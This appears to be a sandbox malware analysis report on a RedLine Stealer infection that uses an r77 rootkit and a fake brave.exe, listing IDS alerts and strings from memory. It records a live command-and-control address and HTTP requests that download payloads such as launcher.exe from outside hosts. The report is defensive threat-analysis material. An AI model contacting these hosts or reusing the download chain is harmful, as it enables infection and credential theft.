Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb- source: brave.exe, 0000000E.00000002.458992408.0000017A76E82000.00000004.00000020.00020000.00000000.sdmp, 85AD.tmp.14.dr
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\Install.pdb source: brave.exe, 0000000E.00000002.458992408.0000017A76E82000.00000004.00000020.00020000.00000000.sdmp, 85AD.tmp.14.dr

Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF6A6032530
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF6A6032530
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF6A6032530
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then mov qword ptr [rsp+28h], 0000000000000000h	14_2_00007FF6A6032530
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then sub rsp, 38h	14_2_00007FF6A602C000
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF6A6028100
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF6A60323A0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF6A60323A0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF6A6032490
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF6A6032490
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF6A6032490
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF6A6032490
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF6A6032490
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then mov qword ptr [rsp+28h], 0000000000000000h	14_2_00007FF6A6032490
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then mov rax, qword ptr [rcx]	14_2_00007FF6A6025530
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then sub rsp, 38h	14_2_00007FF6A60281D0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then sub rsp, 38h	14_2_00007FF6A602F1C0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF6A60322E0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF6A60322E0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF6A60322E0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF6A60322E0

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2039616 ET TROJAN Win32/Agent.AETZ CnC Checkin 192.168.2.3:49712 -> 172.66.43.60:443
Source: Traffic	Snort IDS: 2850027 ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49707 -> 37.220.87.2:27924
Source: Traffic	Snort IDS: 2850286 ETPRO TROJAN Redline Stealer TCP CnC Activity 192.168.2.3:49707 -> 37.220.87.2:27924
Source: Traffic	Snort IDS: 2850353 ETPRO MALWARE Redline Stealer TCP CnC - Id1Response 37.220.87.2:27924 -> 192.168.2.3:49707

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 37.220.87.2:27924

Source: global traffic	HTTP traffic detected: GET /frdkqyshm4sv9kq0/launcher.exe HTTP/1.1Host: filebin.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aula/dmi1dfg7n.kjylug HTTP/1.1Host: www.idpminic.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aula/ofg7d45fsdfgg312.sfhg HTTP/1.1Host: www.idpminic.org
Source: global traffic	HTTP traffic detected: GET /aula/f429fjd4uf84u.sdfh HTTP/1.1Host: www.idpminic.orgConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 185.47.40.36 185.47.40.36

Source: global traffic

TCP traffic: 192.168.2.3:49707 -> 37.220.87.2:27924

Source: GoogleUpdate.exe, 00000035.00000003.451056579.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000035.00000003.446043213.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000035.00000003.444965423.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000035.00000003.449376913.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000035.00000002.585478292.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000035.00000003.443746924.00000000009CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: vbc.exe, 00000002.00000002.419324867.0000000006F3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filebin.net
Source: vbc.exe, 00000002.00000002.418885129.0000000006F04000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.418417866.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419158929.0000000006F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://idpminic.org
Source: vbc.exe, 00000002.00000002.381153178.0000000000C76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.ado/1.0/s6c
Source: vbc.exe, 00000002.00000002.381153178.0000000000C76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adoboshop/Wd
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: vbc.exe, 00000002.00000002.394017297.0000000006B3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: vbc.exe, 00000002.00000002.394017297.0000000006B3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: vbc.exe, 00000002.00000002.394017297.0000000006B3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: vbc.exe, 00000002.00000002.394017297.0000000006B3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: vbc.exe, 00000002.00000002.394017297.0000000006B3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: vbc.exe, 00000002.00000002.394017297.0000000006B3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: vbc.exe, 00000002.00000002.394017297.0000000006B3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: vbc.exe, 00000002.00000002.394017297.0000000006B3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
